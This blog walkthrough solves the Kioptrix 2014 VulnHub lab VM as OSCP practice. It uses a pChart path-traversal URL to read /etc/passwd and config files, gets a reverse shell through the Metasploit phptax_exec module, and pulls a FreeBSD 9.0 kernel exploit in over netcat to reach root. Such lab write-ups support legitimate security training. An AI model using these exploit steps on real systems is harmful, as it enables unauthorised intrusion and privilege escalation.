18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Kioptrix

This is the first in the list of VM’s that are hosted on [vulnhub](https://vulnhub.com) and are good to try on when preparing for the OSCP exam.
There are more to follow, but I’m starting with this one and it should be an easy one.

Recon

First off I need to know what ports are open and what services are running.

┌──[root@n0w4n]─[~/vulnhub]
└──╼ # nmap -n -v -T4 -sS -sV -sC -p- 192.168.50.133
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 15:47 CEST
Host is up (0.00038s latency).

PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:64:61:C0 (VMware)

NSE: Script Post-scanning.
Initiating NSE at 15:47
Completed NSE at 15:47, 0.00s elapsed
Initiating NSE at 15:47
Completed NSE at 15:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.63 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (156B)

It looks like there is a webserver running on port 80 and 8080. There is also a closed port.
In the nmap scan there is a notification on OpenSSL, but no port 443 is open. Also as we look at the version of Apache, we can see it is running on a FreeBSD system. This is important to keep in mind for system recon.

Webserver

When curling the webserver on port 80, I get:


When curling the webserver on port 8080, I get:


The comment in the first curl is a hint and it directs to the content of the actual webpage.
Google has this to say about pChart: *pChart is a PHP library that will help you to create anti-aliased charts or pictures directly from your web server.*

┌──[root@n0w4n]─[~/vulnhub]
└──╼ # searchsploit pchart
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
pChart 2.1.3 - Multiple Vulnerabilities | exploits/php/webapps/31173.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

When looking at the exploit, it seems that there is a path traversal vulnerability that may come in handy.
To see if it works, I’m going to get access to the /etc/passwd  file, which is a file that is available on almost every Unix distro.

http://192.168.50.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin

Looks like it works. 3 users, which you can tell by the UID from 1000 and up.
But these users can’t login > `/sbin/nologin`
There is also an extra superuser by the username of toor which has no shell assigned.
And root has a csh as default shell.

Because this is a FreeBSD distro you need to keep in mind that some files are stored differently than on Debian based distro’s.

http://192.168.50.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/rc.conf

hostname="kioptrix2014"
ifconfig_em0="DHCP"
sshd_enable="NO"
# Set dumpdev to "AUTO" to enable crash dumps, "NO" to disable
dumpdev="NO"
apache22_enable="YES"
mysql_enable="YES"
firewall_enable="YES"
firewall_script="/etc/ipfw.rules"
ossechids_enable="YES"
rc_debug="NO"
monitor_enable="YES"

Let’s look for the Apache configuration file. Because of the nmap scan, but also from the output above, I know I need to look for the apache22 location of the httpd.conf file.

http://192.168.50.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

...[SNIP]...

# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "/usr/local/www/apache22/data"

...[SNIP]...

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

</VirtualHost>

A the bottom I find some information about a virtualhost, namely port 8080.
It seems I need another browser agent. Let’s test this with curl first.


And now with the right agent.


And it works.
I end up at a webpage with some kind of income taxform.
But it runs php and the software is called phptax / pfilez.

┌──[root@n0w4n]─[~/vulnhub]
└──╼ # searchsploit phptax
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit) | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution | exploits/php/webapps/21665.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

The first line looks promising.

msf5 > search pfilez

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/phptax_exec 2012-10-08 excellent Yes PhpTax pfilez Parameter Exec Remote Code Injection


msf5 > use exploit/multi/http/phptax_exec
msf5 exploit(multi/http/phptax_exec) > options

Module options (exploit/multi/http/phptax_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /phptax/ yes The path to the web application
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 PhpTax 0.8


msf5 exploit(multi/http/phptax_exec) > set rhosts 192.168.50.133
rhosts => 192.168.50.133
msf5 exploit(multi/http/phptax_exec) > set rport 8080
rport => 8080
msf5 exploit(multi/http/phptax_exec) > set lhost 192.168.50.130
lhost => 192.168.50.130
msf5 exploit(multi/http/phptax_exec) > exploit

[*] Started reverse TCP double handler on 192.168.50.130:4444
[*] 192.168.50.1338080 - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 2e2fcgbkJnIGuNf4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command: echo uWvGYkyY1ExTYAiC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "2e2fcgbkJnIGuNf4\r\n"
[*] Matching...
[*] A is input...
[*] Reading from socket B
[*] B: "uWvGYkyY1ExTYAiC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.50.130:4444 -> 192.168.50.133:64031) at 2019-05-27 16:59:36 +0200
[*] Command shell session 2 opened (192.168.50.130:4444 -> 192.168.50.133:54454) at 2019-05-27 16:59:36 +0200

id
uid=80(www) gid=80(www) groups=80(www)

Looks like I’m in the system.

After some time searchin the system it seems like a possible way to escalate my privileges is by running a kernel exploit.

$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
┌──[root@n0w4n]─[~/vulnhub/kioptrix]
└──╼ # searchsploit freebsd 9.0
--------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------- ----------------------------------------
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation | exploits/freebsd/local/28718.c
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation | exploits/freebsd/local/26368.c
--------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Time to copy the exploit to the remote system.
First setting up a listener on my end and redirecting the file to stdin.

┌──[root@n0w4n]─[~/vulnhub/kioptrix]
└──╼ # nc -lvnp 9999 < 26368.c
listening on [any] 9999 ...

Then connection to the listener and redirecting the file to stdout.

$ nc -w3 192.168.50.130 9999 > /tmp/exploit.c

Now to compile the script and run it.

$ cd /tmp
$ gcc exploit.c -o exploit
exploit.c:89:2: warning: no newline at end of file
$ ./exploit
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)

Looks like it worked.
Time for the final step and retrieve the flag.

# cd /root
# ls -lah
total 88
drwxr-xr-x 2 root wheel 512B May 27 09:19 .
drwxr-xr-x 18 root wheel 1.0k Apr 6 2014 ..
-rw-r--r-- 2 root wheel 793B Jan 3 2012 .cshrc
-rw------- 1 root wheel 0B Apr 6 2014 .history
-rw-r--r-- 1 root wheel 151B Jan 3 2012 .k5login
-rw-r--r-- 1 root wheel 299B Jan 3 2012 .login
-rw------- 1 root wheel 1B Mar 30 2014 .mysql_history
-rw-r--r-- 2 root wheel 256B Jan 3 2012 .profile
---------- 1 root wheel 2.6k Apr 3 2014 congrats.txt
-rw-r--r-- 1 root wheel 362B May 27 11:47 folderMonitor.log
lrwxr-xr-x 1 root wheel 25B Mar 29 2014 httpd-access.log -> /var/log/httpd-access.log
-rwxr-xr-x 1 root wheel 574B Apr 3 2014 lazyClearLog.sh
-rwx------ 1 root wheel 2.3k Mar 28 2014 monitor.py
lrwxr-xr-x 1 root wheel 44B Mar 29 2014 ossec-alerts.log -> /usr/local/ossec-hids/logs/alerts/alerts.log
# cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in
mind, and not meant for the seasoned pentester. However this does not mean one
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)

 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.